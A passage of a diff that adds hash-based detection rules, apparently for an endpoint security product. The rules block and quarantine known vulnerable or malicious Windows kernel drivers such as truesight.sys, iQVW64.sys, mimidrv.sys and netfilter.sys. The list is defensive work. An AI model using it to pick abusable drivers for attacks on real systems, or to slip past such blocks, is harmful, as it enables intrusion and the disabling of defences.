+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4eecc35524994dc1aa9a21aeb84d3f46463308ea7fb711ec7d7740727c470aae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "696c56bf-a3d4-51e1-9e39-72e65068399b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830752Z",
+ "creation_date": "2026-03-23T11:45:30.830755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830760Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "902b3541c697eb5240438850e952dea654b9d4cbb27f1883f642b41da1ce9fd4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6978114d-3277-5a29-baba-fe59139a80e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148834Z",
+ "creation_date": "2026-03-23T11:45:31.148836Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148841Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "27ec6df3c20c75a5fda013b1454eec3a5732e3abc6e272e306c86be0b41afaf4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "697a50bf-e127-5784-9625-795b96f3c50c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150755Z",
+ "creation_date": "2026-03-23T11:45:31.150758Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150763Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ff1f634c99c0e83bcde4f09c567d42d506619e52a032988963324927e6812cf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6985fa03-155e-5140-9019-e4539a2bec00",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972388Z",
+ "creation_date": "2026-03-23T11:45:29.972390Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972395Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "83aad7f91c4ebec89fb63e60ccc05628281aa0439362097bd91c69f4b74470bb",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6995d290-c9be-5c6a-82f3-1e96964c8ea4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814575Z",
+ "creation_date": "2026-03-23T11:45:31.814577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47337163257da1cb0bd32096b8839f15cf41779e13eba540c9b993e011e186e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "699c3610-d557-5951-8adb-cdcf28d2c4e4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834638Z",
+ "creation_date": "2026-03-23T11:45:30.834641Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834650Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "73e1bc654fe12c42b4f16a4e5294e2a8087e203447c9ee7357e32fa4fd0bd0c3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69ab438e-c7ea-598c-b39e-cff947f039ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153119Z",
+ "creation_date": "2026-03-23T11:45:31.153122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "556266d9e0ae434c1f5a96ef2dc3d5acc07f2c618f398c0c257fa20448ad978f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69b46593-d590-5f1a-a8ff-8e4acb3441ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159122Z",
+ "creation_date": "2026-03-23T11:45:31.159124Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159130Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe6557bc353476efb85bf7e5d4cb864c2a0ed1caca36d6c4f6538fd96ee4ee24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69b7f788-6fdc-51ca-a1c0-948af80233d1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809469Z",
+ "creation_date": "2026-03-23T11:45:31.809471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809479Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3e5821f204424581ca926b85c708e35399f6e959d51e9df0a2e4be5d9f7cca6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69c75ef9-497d-5b6c-9f64-a9b3f1a323a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.149753Z",
+ "creation_date": "2026-03-23T11:45:31.149755Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.149761Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e11a002974e08ff480342e530fa5848fc8235ff1168286701a74080ead79262e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69c76cec-67d2-5fea-aef7-2c6dc11c2151",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979291Z",
+ "creation_date": "2026-03-23T11:45:29.979293Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979298Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4ca4a0932afa09e8df3469768f5ac6feaff2b7ae27ac208a218288fc4fbf102",
+ "comment": "Vulnerable Kernel Driver (aka d.sys) [https://www.loldrivers.io/drivers/7a7630d6-d007-4d84-a17d-81236d9693e1/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69cb304d-3073-5f46-9589-56fa758a8789",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823601Z",
+ "creation_date": "2026-03-23T11:45:31.823603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe1d76944b23d7ddc313ff2c1becc62e9b58cb325b8aa2fae960e22cd7eef0e8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69cd690a-8ca9-574a-a00b-20eb4c215ba4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481841Z",
+ "creation_date": "2026-03-23T11:45:30.481843Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00c3e86952eebb113d91d118629077b3370ebc41eeacb419762d2de30a43c09c",
+ "comment": "Vulnerable Kernel Driver (aka RadHwMgr.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69ce4409-7199-5729-8dac-0e86195c4951",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980396Z",
+ "creation_date": "2026-03-23T11:45:29.980398Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980403Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d59cc3765a2a9fa510273dded5a9f9ac5190f1edf24a00ffd6a1bbd1cb34c757",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69d0b8e8-800a-5c84-9111-25de8534f9f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835610Z",
+ "creation_date": "2026-03-23T11:45:30.835612Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835617Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d660d8f547ba9791500e2a36a7091142ad565291fadae767a4cdf55e4dfc962",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69d6419e-92a2-51d9-93cc-4ce9b1452052",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159993Z",
+ "creation_date": "2026-03-23T11:45:31.159996Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160002Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f365cb2c6488bcd20faa434f9f4abaab59360bd2dfb8f484c893ae66f505b6fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69de5ba6-9be5-51c7-a09b-85aa3fda42d9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621054Z",
+ "creation_date": "2026-03-23T11:45:29.621056Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621062Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2b37ef379ada79d2abe78375312bfcd4b518139bc525a522c2a6329ba097cc4",
+ "comment": "Fujitsu Vulnerable Physmem drivers (aka ADV64DRV.sys) [https://www.loldrivers.io/drivers/24fb7bab-b8c3-46ea-a370-c84d2f0ff614/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69dee7f2-7df0-55a0-9c9d-475c79bd56ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153631Z",
+ "creation_date": "2026-03-23T11:45:31.153633Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153638Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "209e1456e53179a845a26b4a065aa3c599d62e661f2333fa7c25ec62d22328f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69dfec27-d554-5c70-b04f-c8c2152cd167",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984954Z",
+ "creation_date": "2026-03-23T11:45:29.984957Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984966Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3171d7af852e8b6be4651c415ea9490568475c45ecaa02a33dda9babb1643b07",
+ "comment": "Dangerous Physmem Kernel Driver (aka BS_Def64.Sys) [https://www.loldrivers.io/drivers/4a80da66-f8f1-4af9-ba56-696cfe6c1e10/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69eb0700-763f-5e83-b7ae-70c29e868481",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827682Z",
+ "creation_date": "2026-03-23T11:45:30.827684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827689Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "154edec7928d9b616d12bbdc35f9b2b67b9591f9de4129f41b87f9868868110e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "69f8bad3-7f18-5ccb-9af6-b3a9f764a5ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466242Z",
+ "creation_date": "2026-03-23T11:45:30.466245Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466254Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6a0ab366-74ee-52a6-8050-40b6a8b23686",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967763Z",
+ "creation_date": "2026-03-23T11:45:29.967765Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967771Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bc88ce0b5d4b4d42fe51f869b7b4fd34eaa17d04c8058b93b3536129721a129",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
